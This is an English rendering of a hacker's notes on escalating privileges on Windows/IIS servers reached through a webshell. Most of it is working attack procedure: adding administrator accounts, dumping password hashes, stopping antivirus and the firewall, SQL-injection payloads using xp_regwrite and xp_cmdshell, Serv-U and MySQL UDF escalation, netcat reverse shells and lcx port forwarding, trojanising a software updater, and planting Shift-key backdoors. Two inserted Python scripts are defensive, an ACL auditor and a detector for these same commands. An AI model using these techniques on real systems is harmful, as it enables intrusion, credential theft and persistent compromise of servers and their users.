Jianmei Daxia's privilege escalation notes

[Web privilege escalation]
1. Whether cmd commands can be executed is tested with the command net user. If net fails, try net1. If net1 also fails, upload a copy of net1.exe to a readable and writable directory and execute: /c c:\windows\temp\cookies\net1.exe user

2. When escalation has succeeded but 3389 is not open, and the vbs that opens 3389 cannot be uploaded, try uploading rootkit.asp, log in with the user that was just created, and try again.

3. If cmd is denied access, upload your own cmd.exe; the extension of the uploaded file is not limited to .exe (cmd.exe / cmd.com / cmd.txt all work).

4. cmd command: systeminfo. Check whether the three patches KB952004, KB956572 and KB970483 are installed. For whichever is missing, use the corresponding exp: pr for the first, "Brazilian barbecue" for the second, the IIS 6.0 exp for the third.

6. The directory to use is c:\windows\temp\cookies

7. To find the sa or root password, use the webshell's file search function directly; it is extremely convenient.

8. When cmd executes the exp without any echo: enter the exp path C:\RECYCLER\pr.exe in the "com path" field, clear the command field (including /c), and enter "net user jianmei daxia /add".

9. After adding a user and promoting it to administrator, if 3389 cannot be connected, upload the rootkit.asp script; accessing it prompts for a login, and you can log in with the account that was just promoted to administrator.

10. Sometimes monitoring software blocks adding users. Try grabbing the administrator password hash instead: upload PwDump7 ("PwDump7 cracks the current administrator password (hash)"), execute PwDump7.exe, then submit the hash to a decryption website.

11. Sometimes users cannot be added because the password is too simple or too complex, or because antivirus intercepts the command. Use tasklist to view the processes.

12. In fact Xingwai (星外) escalation only needs one executable file: run cmd once, then rename Xingwai's ee.exe to log.csv and execute it.

13. In the directory scanned by wt.asp, a file shown in red can be replaced by the exp. When executing, enter the path of the replaced file in cmd, clear the part in double quotes, and append the add-user command.

14. If nothing else works, try the "TV remote control" tool. It is very effective on both intranet and extranet and gets through firewalls.

15. When the readable and writable directory contains a space, you get: 'C:\Documents' is not recognized as an internal or external command, operable program or batch file. The solution is to use China Chopper's interactive shell to change into the exp directory first, for example: cd "C:\Documents and Settings\All Users\Application Data\Microsoft"
Then execute the exp or cmd and the problem does not occur. An aspshell cannot change directory.

16. Sometimes a user can be added but cannot be added to the administrators group. The administrators group may have been renamed; check the local group members with net localgroup administrators

17. After getting onto the server you can continue into the intranet. Try the router's default account and password, admin / admin.

18. Some cmd implementations behave unusually. In the asp webshell, fill the cmd path in the top field and the lower field with: "c:\xxx\exp.exe" whoami. Remember to add the two double quotes in front, or after it if the first form fails. If that still fails, put the exp path in the cmd field and leave the lower field unchanged.

19. When users cannot be added, or when you want to put a vbs, bat or remote-control trojan into the server's startup items, use the tool known as "the thing that blue-screens and restarts the server directly".

20. When running PwDump7.exe to grab hashes, redirect the output to a file such as 1.txt: /c c:\windows\temp\cookies\PwDump7.exe >1.txt

21. China Chopper tip: upload cmd to an executable directory, right-click, choose the virtual terminal, then Help, and set the terminal path to c:\windows\temp\cmd.exe

22. When aspx is not supported, or is supported but cannot cross directories, upload the vbs that reads IIS, execute it to list all website directories, and find the main site's directory to cross into.
Upload cscript.exe to an executable directory and iispwd.vbs to the website root, then run the cmd command: /c "c:\windows\temp\cookies\cscript.exe" d:\web\iispwd.vbs

23. How to tell whether the server is on an intranet: its address is in 192.168.x.x, 172.16.x.x or 10.x.x.x
 
[Complete DOS commands]
View version: ver
View permissions: whoami
View configuration: systeminfo
View users: net user
View processes: tasklist
View running services: tasklist /svc
View all open ports: netstat -ano
Query the logged-on administrator user name: query user
View the installed environment: ftp 127.0.0.1
View the path of a specified service: sc qc MySQL
Add a user: net user jianmei daxia.asd /add
Promote to administrator: net localgroup administrators jianmei /add
Add a user and promote it in one line: net user jianmei daxia.asd /add & net localgroup administrators jianmei /add
View a specified user's information: net user jianmei
List all users with administrator rights: net localgroup administrators
Join the Remote Desktop Users group: net localgroup "Remote Desktop Users" jianmei /add
Break through the maximum connection limit: mstsc /admin /v:127.0.0.1
Delete a user: net user jianmei /del
Change the administrator account's password: net user administrator daxia.asd
Change the system login password: net password daxia.asd
Activate the GUEST user: net user guest /active:yes
Start the TELNET service: net start telnet
Stop McAfee: net stop "McAfee McShield"
Stop the firewall: net stop sharedaccess
View all files in a directory: dir c:\windows\
View the content of a specified file: type c:\windows\1.asp
Copy cmd.exe to c:\windows\temp and name it cmd.txt: copy c:\windows\temp\cookies\cmd.exe c:\windows\temp\cmd.txt
Command to open port 3389: REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
Check patches: dir c:\windows\ >a.txt&(for %i in (KB952004.log KB956572.log KB2393802.log KB2503665.log KB2592799.log KB2621440.log KB2160329.log KB970483.log KB2124261.log KB977165.log KB958644.log) do @type a.txt|@find /i "%i"||@echo %i Not Installed!)&del /f /q /a a.txt
 
 
[Opening 3389 directly with a SQL statement]
Registry location of the 3389 key: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\fDenyTSConnections
The fDenyTSConnections value directly controls whether 3389 is open: 0 means open, 1 means closed.
The MSSQL xp_regwrite stored procedure can modify the registry, so it can be used to set fDenyTSConnections and thereby open or close 3389.
SQL statement to open 3389:
syue.com/xiaohua.asp?id=100;exec master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server','fDenyTSConnections','REG_DWORD',0;--
SQL statement to close 3389:
syue.com/xiaohua.asp?id=100;exec master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server','fDenyTSConnections','REG_DWORD',1;--
 
 
[Common antivirus processes]
360tray.exe: 360 real-time protection
ZhuDongFangYu.exe: 360 Active Defense
KSafeTray.exe: Kingsoft (Jinshan) Guard
McShield.exe: McAfee
SafeDogUpdateCenter.exe: Server SafeDog
 
 
[Using sensitive directories and the registry in Windows privilege escalation]
Sensitive directory: directory permission; escalation use
C:\Program Files: the default Users group can view the directory; shows which application software is installed on the server
C:\Documents and Settings\All Users\Start Menu\Programs: Everyone can view; shortcuts can be viewed and downloaded, and their properties reveal installation paths
C:\Documents and Settings\All Users\Documents: Everyone has Full Control; upload and execute cmd and exp
C:\Windows\system32\inetsrv: Everyone has Full Control; upload and execute cmd and exp
C:\Windows\my.ini and C:\Program Files\MySQL\MySQL Server 5.0\my.ini: the default Users group can view; the MySQL installer writes the root password to this file
C:\Windows\system32: the default Users group can view; the Shift backdoor usually sits in this folder, and the backdoor can be downloaded to crack its password
C:\Documents and Settings\All Users\Start Menu\Programs\Startup: Everyone can view; try writing a vbs or bat into the directory, and it will run after the server restarts
C:\RECYCLER and D:\RECYCLER: Everyone has Full Control of the recycle bin directory; commonly used to execute cmd and exp
C:\Program Files\Microsoft SQL Server: the default Users group can view; collect MSSQL-related information, and the directory sometimes also allows execution
C:\Program Files\MySQL: the default Users group can view; find the root password in user.MYD under the MySQL directory
C:\Oraclexe: the default Users group can view; try escalating with Oracle's default account
C:\WINDOWS\system32\config: the default Users group can view; try downloading the SAM file for cracking
C:\Program Files\Gene6 FTP Server\Remote Admin\Remote.ini: the default Users group can view; the G6FTP password is stored in Remote.ini
c:\Program Files\RhinoSoft.com\Serv-U and c:\Program Files\Serv-U: the default Users group can view; the virtual host website paths and passwords are stored in ServUDaemon.ini
c:\Windows\system32\inetsrv\MetaBase.xml: the default Users group can view; the IIS configuration file
C:\Tomcat5.0\conf\resin.conf: the default Users group can view; the location where the Tomcat password is stored
C:\ZKEYS\Setup.ini: the default Users group can view; the location where the ZKEYS virtual host stores passwords
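As an added defensive example (not part of the original notes), the following Python script audits icacls-style ACL listings for exactly the weaknesses the table above relies on: broad principals with write or full control on directories, and read access for such principals on the configuration files that store passwords. The listing text, the principal names and the right codes checked are constructed assumptions modelled on the output format of the Windows icacls command.

```python
"""Audit icacls-style ACL listings for the weak permissions described above:
broad principals (Everyone, Users, Authenticated Users) with write or full
control on directories, or read access to files that hold credentials.
The input text is constructed in the layout `icacls <path>` prints: the
first line of each block is "<path> <principal>:(flags)(rights)", and the
remaining ACEs for that path follow on indented lines.
"""
import re

BROAD_PRINCIPALS = {
    "everyone", "builtin\\users", "users",
    "nt authority\\authenticated users", "authenticated users",
}
# Principals that may appear in the listing; longest names first so that a
# name containing spaces is split off the path correctly.
KNOWN_PRINCIPALS = [
    "NT AUTHORITY\\Authenticated Users", "NT AUTHORITY\\SYSTEM",
    "BUILTIN\\Administrators", "BUILTIN\\Users", "CREATOR OWNER", "Everyone",
]
# icacls simple rights and specific rights that permit writing.
WRITE_RIGHTS = {"F", "M", "W", "GA", "GW", "WD", "AD", "WA", "WEA", "DC", "WDAC", "WO"}
READ_RIGHTS = {"R", "RX", "GR", "RD"}
# Files named in the notes as storing passwords (matched as path suffixes).
CREDENTIAL_FILES = ("my.ini", "servudaemon.ini", "remote.ini", "metabase.xml",
                    "\\config\\sam", "setup.ini", "resin.conf")

ACE_TAIL = re.compile(r":((?:\([^)]*\))+)\s*$")


def split_path_and_principal(head):
    """Split '<path> <principal>' when the principal may contain spaces."""
    for name in KNOWN_PRINCIPALS:
        if head.lower().endswith(" " + name.lower()):
            return head[:-len(name) - 1], head[-len(name):]
    path, _, who = head.rpartition(" ")
    return path, who


def parse_icacls(text):
    """Return [(path, principal, [rights tokens])] for every ACE in the listing."""
    entries, path = [], None
    for raw in text.splitlines():
        m = ACE_TAIL.search(raw)
        if not m:
            continue  # blank line or the trailing "Successfully processed" line
        head = raw[:m.start()]
        tokens = [t for grp in re.findall(r"\(([^)]*)\)", m.group(1)) for t in grp.split(",")]
        if raw.startswith(" "):
            who = head.strip()          # continuation ACE for the current path
        else:
            path, who = split_path_and_principal(head.strip())
        if path:
            entries.append((path, who, tokens))
    return entries


def audit(text):
    """Return [(path, principal, reason)] for ACEs that match the weaknesses above."""
    findings = []
    for path, who, tokens in parse_icacls(text):
        if who.lower() not in BROAD_PRINCIPALS:
            continue
        rights = set(tokens)
        if rights & WRITE_RIGHTS:
            findings.append((path, who, "writable by broad principal"))
        elif rights & READ_RIGHTS and path.lower().endswith(CREDENTIAL_FILES):
            findings.append((path, who, "credential file readable by broad principal"))
    return findings


# Constructed listing covering several paths from the table above.
SAMPLE_ICACLS = r"""C:\RECYCLER Everyone:(OI)(CI)(F)
            BUILTIN\Administrators:(I)(OI)(CI)(F)
C:\Windows\system32\inetsrv BUILTIN\Users:(OI)(CI)(M)
                            NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
C:\Program Files\MySQL\MySQL Server 5.0\my.ini BUILTIN\Users:(I)(RX)
                                               BUILTIN\Administrators:(I)(F)
C:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini NT AUTHORITY\Authenticated Users:(I)(R)
C:\WINDOWS\system32\config\SAM BUILTIN\Administrators:(I)(F)
                               NT AUTHORITY\SYSTEM:(I)(F)
C:\Program Files\Common Files NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
                              BUILTIN\Users:(I)(OI)(CI)(RX)
Successfully processed 6 files; Failed processing 0 files
"""

if __name__ == "__main__":
    for path, who, reason in audit(SAMPLE_ICACLS):
        print(f"{reason}: {path} ({who})")
```

Feed it the saved output of icacls run over the directories in the table to get a list of paths whose ACLs need tightening.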
 
 
[Sensitive registry locations in privilege escalation]
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\MSSQLServer\MSSQLServer\SuperSocketNetLib\Tcp: the MSSQL port
HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\fDenyTSConnections: the remote terminal is enabled when the value is 0
HKEY_LOCAL_MACHINE\SOFTWARE\MySQL AB: registry location of MySQL
HKEY_LOCAL_MACHINE\SOFTWARE\HZHOST\CONFIG: registry configuration location of the Huazhong (HZHOST) virtual host
HKEY_LOCAL_MACHINE\SOFTWARE\Cat Soft\Serv-U\Domains\1\UserList: Serv-U user and password (Serv-U encrypted) location
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp: the PortNumber value is the 3389 port number
HKEY_CURRENT_USER\Software\PremiumSoft\Navicat\Servers: registry location of Navicat, the MySQL management tool; can be searched on Google
HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters: the Radmin configuration, often exported and overwritten during escalation
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\MSFtpsvc\Parameters\Virtual Roots: IIS registry; the full-version disclosure of user paths and FTP user names
HKEY_LOCAL_MACHINE\software\hzhost\config\settings\mastersvrpass: passwords such as mssql and mysql saved in the Huazhong host registry
HKEY_LOCAL_MACHINE\SYSTEM\LIWEIWENSOFT\INSTALLFREEADMIN\11: the sa account password of the Xingwai host MSSQL, double-MD5 encrypted
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\MSFtpsvc\Parameters\Virtual Roots: registry location of the Xingwai FTP; ControlSet001 and ControlSet003 also exist besides ControlSet002
 
 
[Removing and restoring wscript.shell]
Unregister the wscript.shell object, from cmd or directly from Run: regsvr32 /u %windir%\system32\wshom.ocx

Unregister the FSO object, from cmd or directly from Run: regsvr32.exe /u %windir%\system32\scrrun.dll

Unregister the Stream object, from cmd or directly from Run: regsvr32 /s /u "C:\Program Files\Common Files\System\ado\msado15.dll"

To restore, remove /u and re-register the ASP components above, so that the corresponding components can be used again.
 
 
[How to find the exact terminal connection port]
In the aspx webshell, click "System Information"; the third item is the current 3389 port.
Or run the command that lists running services: tasklist /svc
You will find a line such as: svchost.exe 1688 TermService
Note the PID value 1688,
then view all open ports: netstat -ano
The port listed for PID 1688 is the current 3389 port.
 
 
[Breaking through "cannot find wmiprvse.exe" in IIS6 escalation]
Method 1:
In an IIS environment with loose permissions, we can end the wmiprvse.exe process directly from the aspx webshell and then check the process list.
After it is ended it starts again with a different PID. At that point run the exp again and it succeeds immediately.

Method 2:
On a virtual host, where permissions are generally strictly limited, there is no permission to end the process. Consider combining with another overflow tool that forces the server to restart, such as "the thing that blue-screens and restarts the server directly".
It can even be brute force: DDoS it and it goes down in seconds. If the administrators find the server failing, their first thought is that the server is hung; when they restart the server (even just restarting IIS), it also works immediately.
 
 
[Local overflow privilege escalation]
A program has a region called the buffer, whose length is preset. If the user's input exceeds the buffer length, the program overflows.
Buffer overflow vulnerabilities mainly come from software that does not check the buffer.
Running an existing exploit for such an overflow vulnerability promotes the account from the Users group or another system user to the administrators group.
To execute cmd commands, wscript.shell support or aspx script support is required, because aspx scripts can call .NET components to execute cmd commands.
 
 
[sa privilege escalation]
Scan the open ports; once 1433 is found open, look for the sa password to escalate. Use the webshell's file search function; the sa password is generally in the conn.asp, config.asp or web.config files.
You can also locate the configuration file through the registry. Check whether aspx is supported; if it is, cross directories into other sites. After finding the password, log in through the aspshell's SQL escalation function and execute the command to create a user.
Executing commands from the aspx webshell is slightly different: click Database Management, select MSSQL, enter server=localhost;UID=sa;PWD=;database=master;Provider=SQLOLEDB with the account and password, and connect.
Add a user: exec master.dbo.xp_cmdshell 'net user jianmei daxia.asd /add';--
Promote to administrator: exec master.dbo.xp_cmdshell 'net localgroup administrators jianmei /add';--
PS: if the user cannot be added, xp_cmdshell has not been created. Add xp_cmdshell with: use master; dbcc addextendedproc ('xp_cmdshell', 'xplog70.dll')
 
 
[root privilege escalation]
The prerequisites for MySQL escalation are that MySQL is installed on the server, the MySQL service has not been downgraded (by default it is installed running with SYSTEM privileges), and the root account password has been obtained.
How to determine whether MySQL on a Windows server has been downgraded?
cmd command: net user. If there are users named mysql, mssql or similar, the mssql and mysql services have usually been downgraded to run under those users.
How to determine whether the MySQL service is enabled on the server?
Port 3306 is open, although some administrators change the default port. Another indicator is whether the website supports PHP; if it does, it usually uses a MySQL database.
How to view the root password?
Find the user.MYD file in the MySQL installation directory; the root hash is inside it, generally a 40-character hash. Some PHP websites use the root user and store it in the conn.asp or config.asp files.
Sometimes the file looks very messy and you need to combine the pieces yourself: the first 17 characters are on the first line and the other 23 on the third or another line.
Use "MySQL execution" in the PHP webshell directly, or upload a UDF.php. If the website does not support PHP, go to another PHP site or upload UDF.php to another PHP shell.
After filling in the account and password, install the DLL: click "Automatically install MySQL BackDoor". Once it reports that the function was exported and created successfully, the add-user command can be executed immediately.
Note: for versions up to and including 5.0, the default c:\windows\system directory is sufficient. For versions above 5.1 the DLL cannot be exported to the system directory to create custom functions; it can only be exported to the lib/plugin directory under the MySQL installation directory.
For example: D:/Program Files/MySQL/MySQL Server 5.1/lib/plugin/mysql.dll
If the password cannot be seen, or fewer than 40 characters can be combined, install MySQL locally:
1. Stop the mysql service
2. Replace the three downloaded files (user.MYI, user.MYD, user.frm)
3. In cmd, switch to the bin directory and start MySQL in safe mode: mysqld-nt --skip-grant-tables
4. Open a second cmd, switch to the bin directory and run: mysql -u root (versions may differ: mysql -uroot -proot)
5. Finally query: select user, password from mysql.user;
 
 
[Serv-U privilege escalation]
This file contains the Serv-U MD5 password: C:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini
Find ServUDaemon.ini, open it, and look for: LocalSetupPassword=nqFCE64E0056362E8FCAF813094EC39BC2
Take the MD5 ciphertext to decrypt, then log in with the recovered password and escalate.
The prerequisites for Serv-U escalation are that port 43958 is open and the account password is known!
If the account password is the default, you can use the Serv-U escalation function in the shell directly. The aspx and php webshells are recommended because they show the echo.
530 means the password is not the default, 330 means success, and 900 means the password is the default.
Find a shortcut in the Programs menu, or download the relevant files locally and check their properties, to find the Serv-U installation directory.
Serv-U escalation by modifying its directory:
Find the Serv-U directory, then the user configuration file ServUDaemon.ini. Add a user entry directly and save!
Then from the local cmd: ftp <server ip>
Press Enter, enter the account and password, and press Enter again.
Next, try the usual cmd commands for escalation. If they do not work, use the FTP escalation command:
quote site exec net user ABCD /add (adds a user)
quote site exec net localgroup administrators jianmei /add (promotes to administrator)
200 EXEC command successful (TID=33). is the echo of successful execution.
Maintenance=System: add this line to the account's entry to designate the new account as a system administrator.
ReloadSettings=True: add this item after modifying the ini file; Serv-U then automatically reloads the configuration file and the change takes effect.
 
 
[Port forwarding]
When is port forwarding appropriate?
1. The server is on an intranet and we cannot connect to it.
2. The server has a firewall that blocks our connection.
The prerequisite for port forwarding is that we have a public IP or a public server.
Find a readable and writable directory and upload lcx.exe
Local cmd command: lcx.exe -listen 1988 4567 (listen on local port 1988 and forward to port 4567)
Then the shell command: /c c:\windows\temp\cookies\lcx.exe -slave <local ip> 1988 <server ip> 3389 (forward the server's 3389 to local port 4567)
Then connect locally to: 127.0.0.1:4567
The above is for a local machine on the public Internet; on a public server the procedure is:
Upload lcx.exe and cmd.exe to the same directory on the server and run with cmd.exe: lcx.exe -listen 1988 4567
Then click port mapping in the aspx shell, change the remote IP to the site's IP, fill in 1988 as the remote port, click map port, and then connect to 127.0.0.1:4567 on the server.
 
 
[NC reverse shell privilege escalation]
When net user can be executed but a user cannot be created, an NC reverse shell can be used to escalate; for intranet servers in particular it is the better choice.
However, this method also fails once the other side has a firewall or blocks all ports except the common ones.
Find a readable and writable directory and upload nc.exe and cmd.exe

-l    listen for inbound connections
-p port    the local port to open
-t    answer inbound requests in telnet form
-e prog    redirect a program
Local cmd execution: nc -vv -l -p 52 (wait for the reverse connection)
Then execute in the shell: c:\windows\temp\nc.exe -vv <server ip> 999 -e c:\windows\temp\cmd.exe. A port such as 80 or 8080 is better, as it is much less likely to be blocked by the firewall.
After it succeeds, local cmd command: cd\ (just a habit)
Then connect to the server with telnet: telnet <server ip> 999
If pressing Enter shows the selected server's IP address, it worked. The permissions are then relatively high; try creating a user!
Bad Boy's way:
Local cmd execution: nc -vv -l -p 52 (wait for the reverse connection)
c:\windows\temp\nc.exe -e c:\windows\temp\cmd.exe <server ip> 52
Low-key Xiaofei's way:
Execute in the shell: c:\windows\temp\nc.exe -l -p 110 -t -e c:\windows\temp\cmd.exe

In general the success rate of this form is very low. It is better to enter the command c:\windows\temp\nc.exe in the cmd field, and in the parameter field: -vv <server ip> 999 -e c:\windows\temp\cmd.exe
The success rate of this technique is much higher than the one above. Not only NC works this way; pr and other escalation exps can too.
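As an added defensive example (not part of the original notes), the following Python script scans process-creation command lines, such as those exported from Windows Security event 4688 or Sysmon event 1, for the escalation commands catalogued in this page: the DOS command list (net user /add, net localgroup administrators /add, net stop on antivirus or the firewall, REG ADD fDenyTSConnections, PwDump7), the xp_regwrite / xp_cmdshell statements of the 3389 and sa sections, the lcx port forwarding and the NC reverse shell above. The `parent|command line` record format, the sample records and the rule names are constructed assumptions.

```python
"""Flag the privilege-escalation command lines catalogued in these notes.

Input format (constructed for this example): one record per line,
"<parent process>|<command line>", as a SIEM might export from
Windows Security event 4688 or Sysmon event 1.
"""
import re

# Detection rules: each mirrors a command that appears in the notes.
RULES = [
    ("local account added",
     re.compile(r"\bnet1?(\.exe)?\s+user\s+\S+\s+\S+\s+/add\b", re.I)),
    ("account added to privileged group",
     re.compile(r'\bnet1?(\.exe)?\s+localgroup\s+"?(administrators|remote desktop users)"?\s+\S+\s+/add\b', re.I)),
    ("guest account activated",
     re.compile(r"\bnet1?(\.exe)?\s+user\s+guest\s+/active:\s*yes", re.I)),
    ("RDP enabled via registry",
     re.compile(r"fDenyTSConnections", re.I)),
    ("security product or firewall stopped",
     re.compile(r'\bnet1?(\.exe)?\s+stop\s+"?(mcafee mcshield|sharedaccess)', re.I)),
    ("script component unregistered",
     re.compile(r"\bregsvr32(\.exe)?\s+(/s\s+)?/u\b", re.I)),
    ("credential dump tool",
     re.compile(r"pwdump7?\.exe", re.I)),
    ("MSSQL extended procedure",
     re.compile(r"xp_(cmdshell|regwrite)", re.I)),
    ("port forwarding or reverse shell",
     re.compile(r"\b(lcx\.exe\s+-(slave|listen)|nc\.exe\s+.*-e\s+\S*cmd\.exe)", re.I)),
    ("binary run from world-writable scratch directory",
     re.compile(r"\\(temp|recycler)\\\S*\.(exe|com)\b", re.I)),
]

# Parents that should never spawn administrative commands (web/db server processes).
SUSPICIOUS_PARENTS = {"w3wp.exe", "aspnet_wp.exe", "sqlservr.exe", "php-cgi.exe"}


def classify(cmdline, parent=""):
    """Return the names of all rules matched by one command line."""
    hits = [name for name, rx in RULES if rx.search(cmdline)]
    if hits and parent.lower() in SUSPICIOUS_PARENTS:
        hits.append("spawned by web or database server process")
    return hits


def scan(records):
    """Return {record number: [rule names]} for every record that matched."""
    findings = {}
    for n, rec in enumerate(records, 1):
        parent, _, cmd = rec.partition("|")
        hits = classify(cmd, parent)
        if hits:
            findings[n] = hits
    return findings


# Constructed sample records; the commands are the ones listed in the notes.
SAMPLE = [
    r"w3wp.exe|cmd.exe /c c:\windows\temp\cookies\net1.exe user jianmei daxia.asd /add",
    r"cmd.exe|net localgroup administrators jianmei /add",
    r"w3wp.exe|cmd.exe /c c:\windows\temp\cookies\PwDump7.exe >1.txt",
    r'sqlservr.exe|net stop "McAfee McShield"',
    r'cmd.exe|REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f',
    r"w3wp.exe|c:\windows\temp\nc.exe -vv 203.0.113.5 999 -e c:\windows\temp\cmd.exe",
    r"explorer.exe|notepad.exe c:\users\admin\notes.txt",
    r"services.exe|svchost.exe -k netsvcs",
    r"sqlservr.exe|cmd.exe /c net user jianmei daxia.asd /add",
]

if __name__ == "__main__":
    for n, hits in scan(SAMPLE).items():
        print(f"record {n}: {', '.join(hits)}")
```

A command line that matches any rule and whose parent is a web or database server process is the strongest signal here, because that is exactly the webshell-to-cmd path the notes describe.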
 
 
[Xingwai privilege escalation]
How to know whether it is a Xingwai (星外) host?
First: "freehost" appears in the website's physical path.
Second: in the asp webshell's program list there are folders such as "7i24 virtual host management platform" and "Xingwai host".
Default account: freehostrunat
Default password: fa41328538d7be36e83ae91a78a1b16f! seven
The freehostrunat user is created automatically when the Xingwai system is installed. It already belongs to the administrators group and the password does not need to be decrypted; you can log in to the server directly.
Directories Xingwai often leaves writable:
C:\RECYCLER\
C:\windows\temp\
e:\recycler\
f:\recycler\
C:\php\PEAR\
C:\WINDOWS\7i24.com\FreeHost
C:\php\dev
C:\System Volume Information
C:\7i24.com\serverdoctor\log\
C:\WINDOWS\Temp\
c:\windows\hchiblis.ibl
C:\7i24.com\iissafe\log\
C:\7i24.com\LinkGate\log
C:\Program Files\Thunder Network\Thunder7\
C:\Program Files\Thunder Network\Thunder\
C:\Program Files\Symantec AntiVirus\SAVRT\
c:\windows\DriverPacks\C\AM2
C:\Program Files\FlashFXP\
c:\Program Files\Microsoft SQL Server\90\Shared\ErrorDumps\
C:\Program Files\Zend\ZendOptimizer-3.3.0\
C:\Program Files\Common Files\
c:\Documents and Settings\All Users\Application Data\Hagel Technologies\DU Meter\log.csv
c:\Program Files\360\360Safe\deepscan\Section\mutex.db
c:\Program Files\Helicon\ISAPI_Rewrite3\error.log
c:\Program Files\Helicon\ISAPI_Rewrite3\Rewrite.log
c:\Program Files\Helicon\ISAPI_Rewrite3\httpd.conf
c:\Program Files\Common Files\Symantec Shared\Persist.bak
c:\Program Files\Common Files\Symantec Shared\Validate.dat
C:\Program Files\Zend\ZendOptimizer-3.3.0\docs
C:\Documents and Settings\All Users\DRM\
C:\Documents and Settings\All Users\Application Data\McAfee\DesktopProtection
C:\Documents and Settings\All Users\Application Data\360safe\softmgr\
C:\Program Files\Zend\ZendOptimizer-3.3.0\lib\Optimizer-3.3.0\php-5.2.x\ZendOptimizer.dll
C:\Documents and Settings\All Users\Application Data\Microsoft\Media Index\

ee.exe escalation method:
Find a readable and writable directory and upload ee.exe
cmd command: /c c:\windows\temp\cookies\ee.exe -i (gets the ID of the Xingwai account, for example the echo: FreeHost ID: 724)
Then: /c c:\windows\temp\cookies\ee.exe -u 724 (obtains the Xingwai account password)

vbs method:
Find a readable and writable directory and upload cscript.exe and iispwd.vbs
cmd command: /c "c:\windows\temp\cookies\cscript.exe" c:\windows\temp\cookies\iispwd.vbs
This reads the IIS configuration. It yields not only the Xingwai account password but also the directories of all sites on the same server.

Complete workable approach:
Testing shows that the files in the following directories all have Everyone permissions: they can be modified, uploaded, replaced, deleted and, most importantly, executed:
360 antivirus db file replacement:
c:\Program Files\360\360SD\deepscan\Section\mutex.db
c:\Program Files\360\360Safe\deepscan\Section\mutex.db
C:\Program Files\360\360Safe\AntiSection\mutex.db
ISAPI_Rewrite3 file replacement:
C:\Program Files\Helicon\ISAPI_Rewrite3\Rewrite.log
C:\Program Files\Helicon\ISAPI_Rewrite3\httpd.conf
C:\Program Files\Helicon\ISAPI_Rewrite3\error.log
Norton antivirus file replacement:
c:\Program Files\Common Files\Symantec Shared\Persist.bak
c:\Program Files\Common Files\Symantec Shared\Validate.dat
c:\Program Files\Common Files\Symantec Shared\Persist.Dat
"First-class filtering" (iissafe) related directories and files:
C:\7i24.com\iissafe\log\startandiischeck.txt
C:\7i24.com\iissafe\log\scanlog.htm
Other:
Zend file replacement: C:\Program Files\Zend\ZendOptimizer-3.3.0\lib\Optimizer-3.3.0\php-5.2.x\ZendOptimizer.dll
Huadun file replacement: C:\WINDOWS\hchiblis.ibl
Flash file replacement: C:\WINDOWS\system32\Macromed\Flash\Flash10q.ocx
DU Meter traffic log file replacement: c:\Documents and Settings\All Users\Application Data\Hagel Technologies\DU Meter\log.csv
 
 
[360 privilege escalation]
Find a readable and writable directory and upload 360.exe
cmd command: /c c:\windows\temp\cookies\360.exe
Three English prompts appear:

360 Antivirus Privilege Escalation Exploit By friddy 2010.2.2
You will get a Shift5 door!
Shift5 Backdoor created!

That indicates success. Then connect to the server and press the Shift key five times; Task Manager pops up. Click New Task and run explorer.exe, and the desktop appears. Everyone knows what to do next.
 
 
[Sogou privilege escalation]
The Sogou directory is readable and writable by default. Sogou upgrades itself automatically from time to time, and the upgrade file is pinyinup.exe.
Simply replace this file with your own remote-control trojan, or with a batch file that adds an account; when Sogou upgrades, the goal is achieved.
 
 
[Huazhong (HZHOST) virtual host privilege escalation]
In my experience, the usual overflow escalations have no effect on this virtual host, and Huazhong has no vulnerability as obvious as Xingwai's.
So the key to Huazhong escalation is information gathering. The main registry locations are:
HKEY_LOCAL_MACHINE\SOFTWARE\HZHOST\CONFIG\
HKEY_LOCAL_MACHINE\software\hzhost\config\settings\mysqlpass: root password
HKEY_LOCAL_MACHINE\software\hzhost\config\settings\mssqlpss: sa password
c:\windows\temp contains FTP login records left by the host, including user names and passwords.
The information above is used with the "hzhosts Huazhong virtual host system 6.x database password cracking tool".
Baidu search: hzhosts Huazhong virtual host system 6.x database password cracking tool
 
 

[N-point virtual host]
The default database location of the N-point virtual host management system is: host_date/#host # date#.mdb
The URL cannot be entered directly, so replace # with %23 and space with %20.
The modified download address is /host_date/%23host%20%23%20date%23196.mdb
After downloading the N-point database, find the FTPuser and FTPpass values in the sitehost table. FTPpass is N-point encrypted data; decrypt it with the N-point decryption tool to obtain the FTP password.
N-point default installation paths: C:\Program Files\NpointSoft\npointhost\web\
D:\Program Files\NpointSoft\npointhost\web\
The default permission is readable. When the other party's virtual host is N-point, consider reading the folder to download the database.
N-point decryption tool code:
<%
set iishost = Server.CreateObject("npoint.host")
x = iishost.Eduserpassword("FTPpass value", 0)
Response.Write x
%>
Run it in a local N-point environment inside the N-point directory. The obtained password minus its last 10 characters is the N-point virtual host management password.
Then find the Hostip or hostdomain in the hostcs table, which is the login confirmation of the management system.
Generally the defaults are Hostip=127.0.0.1 and hostdomain=www.npointhost.com. They can be ignored, because if they were not modified, the host_domain in the sitehost table is the domain bound to the server's default IP; check the IP directly and then scan the address range in batch.
The management system address is the IP; select the virtual host to log in.
Everyone should know how to get a shell from there.
The sa and root passwords in the hostcs table are decrypted the same way; by default they all decrypt to 123456.
In addition, the N-point system administrator password in the adminlogo table is a 30-character cfs encryption: http://www.md5.com.cn/cfs Try a collision there, or crack it with an asm tool. I was unlucky.
3057C0DB854C878E72756088058775 is the default admin password.
 
 
[Database dumping]
